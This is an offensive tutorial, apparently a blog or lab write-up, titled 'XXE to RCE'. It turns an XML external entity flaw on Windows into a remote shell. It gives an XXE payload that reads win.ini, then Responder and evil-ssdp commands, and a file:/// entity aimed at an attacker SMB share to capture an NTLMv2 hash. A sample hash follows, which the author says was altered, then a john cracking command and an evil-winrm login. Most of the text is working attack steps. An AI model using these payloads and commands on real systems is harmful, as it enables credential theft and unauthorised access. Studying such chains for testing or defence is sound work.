[ XXE to RCE ]
Because let's admit it - you thought you could only read files.
Discovery Phase:
<?xml version = "1.0"?><!DOCTYPE foo [<!ENTITY own SYSTEM "file:///c:/windows/win.ini"> ]>
If we can verify that we're able to read the contents of a file-system with XXE - we're able to move on.
You're going to need a few things for this to work though.
- Responder
- evil-ssdp
- evil-winrm
Go ahead and get a Responder session running.
responder -I tun0 -v
Now that we have a Responder session running, we need to do a little bit of evil magic.
Open a new terminal, and in that terminal - let's start up evil-ssdp.py
python3 /usr/share/evil-ssdp/evil_ssdp.py <interface>
This should give you output that looks something akin too...:
___________ .__.__ _________ _________________ __________
\_ _____/__ _|__| | / _____// _____/\______ \\______ \
| __)_\ \/ / | | \_____ \ \_____ \ | | \| ___/
| \\ /| | |__/ \/ \ | ` \ |
/_______ / \_/ |__|____/_______ /_______ //_______ /____|
\/ \/ \/ \/
...by initstring (gitlab.com/initstring)
Additional contributors: Dwight Hohnstein
[*] EVIL TEMPLATE: /usr/share/evil-ssdp/templates/office365
[*] DEVICE DESCRIPTOR: http://x.x.x.x:8888/ssdp/device-desc.xml
[*] SERVICE DESCRIPTOR: http://x.x.x.x:8888/ssdp/service-desc.xml
[*] PHISHING PAGE: http://x.x.x.x:8888/ssdp/present.html
[*] SMB POINTER: file://///x.x.x.x/smb/hash.jpg
Thanks Dwight.
The idea behind this attack is that we're going to utilize whatever protocol native to Windows that we can. There are a few options. We have:
(If the target machine has PHP installed, we're in luck with that as well)
The one we're interested in is the file:/// protocol.
I suggest using Burp Suite's Repeater - but feel free to do whatever you want. The idea is that we're going to use the file:/// to point towards our SMB Share (CIFS or Common Internet File Structure). When we do so, Responder will capture the NTLM hash.
Nice, eh?
[SMB] NTLMv2-SSP Client : ::ffff:[REDACTED]
[SMB] NTLMv2-SSP Hash : [REDACTED-USER]::WIN-REDACTED:ffda536eebddd9ff:56608E6BB63B9EF8075E75E6FCFEAD13:010100000000000080070C0C4462D8014105FCCC2A7C88C7000BBB00020008004B0049003000490001001E00570049004E002D0046004E0056005800580034005800530047004900470004003400570049004E002DAA46004E005600580058003400580053004700490047002E004B0Z4900300049002E004C004F00430041004C00030014004B004300300049002E004C004F00470041004C00050014004B004900200049002E004C004F004300410C4C000700080080070B0B4462D8010600040002000000080030003000000000000000000000000030000074C73B2884C3F6CAB391C1BFDD689CBD8363A424AAAA27C415102C0CDA855CE20A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0031003710000000000000000000000000
This hash won't crack, because I changed up a few things for Security reasoning. But if you ever do receive a NTLMv2 hash like this, try cracking with john.
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Let's suppose it gave us the password 'ohnoitss1ren'.
$---Bling Bling---$
From this point forward, we're going to make use of one of my favorite tools. evil-winrm to gain a shell on the target machine.
evil-winrm -i <target-box> -u <target-username> -p ohnoitss1ren
With that, you'll get a shell.
From XXE.
to RCE.

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